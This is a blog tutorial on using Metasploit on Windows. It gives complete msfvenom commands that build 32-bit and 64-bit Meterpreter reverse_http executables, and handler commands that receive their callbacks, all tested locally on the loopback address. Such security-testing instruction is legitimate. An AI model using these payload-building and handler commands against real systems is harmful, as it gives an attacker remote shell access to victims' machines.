In my previous post “Reading Memory Of 64-bit Processes” I used the Windows version of Metasploit so that I could do all tests with a single machine: running the Meterpreter client and server on the same machine.
The Metasploit framework requires administrative rights to install on Windows, it will install by default in the c:\metasploit folder. Your AV on your Windows machine will generate alerts when you install and use Metasploit on Windows, so make sure to create the proper exceptions.
General remark: Metaploit on Windows is slower than on Linux, be patient.
I use MSFVenom (c:\metasploit\msfvenom.bat) to create 32-bit and 64-bit executables to inject the Meterpreter payload.
Command “msfvenom.bat –help” will show you all options:
Command “msfvenom.bat –list payloads” will show you all payloads:
Command “msfvenom.bat –help-formats” will show you all output formats:
Executable formats will generate programs and scripts, while transform formats will just produce the payload. More on this later.
I use msfvenom.bat to create a 32-bit and 64-bit executable with the meterpreter_reverse_http payload.
Here is the command for 32-bit: “msfvenom.bat –payload windows/meterpreter_reverse_http –format exe –out meterpreter-32.exe LHOST=127.0.0.1”.
Since I did not specify the platform and architecture, msfvenom will choose these based on the payload I selected.
Format exe is the executable format for .exe files.
windows/meterpreter_reverse_http is the Windows 32-bit version of the meterpreter_reverse_http payload. This payload takes several options, which can be enumerated with the following command:
“msfvenom.bat –payload windows/meterpreter_reverse_http –payload-options”
LHOST is the only required option that has no default value. I use LHOST=127.0.0.1 because I’m doing everything on the same machine, so the loopback address can be used.
Here is the command for 64-bit: “msfvenom.bat –payload windows/x64/meterpreter_reverse_http –format exe –out meterpreter-64.exe LHOST=127.0.0.1”.
Now that I created my 2 executables, I can start Metasploit’s console and use them.
I start c:\metasploit\console.bat (this will take a couple of minutes on Windows).
And then I start the Meterpreter server with these commands:
use exploit/multi/handler set payload windows/meterpreter_reverse_http set lhost 127.0.0.1 exploit
The Metasploit handler is now waiting for connections. I start meterpreter-64.exe as administrator, because I want it to have SYSTEM access (I ran msfvenom and console as normal user).
When started, meterpreter-64.exe will connect to the handler and wait for instructions (the process will not exit). We can see this connection here:
With the sessions command, we can see all callbacks:
And here we select session 1 to interact with Meterpreter:
From here on, we can use this Meterpreter shell:
Article Link: https://blog.didierstevens.com/2017/08/14/using-metasploit-on-windows/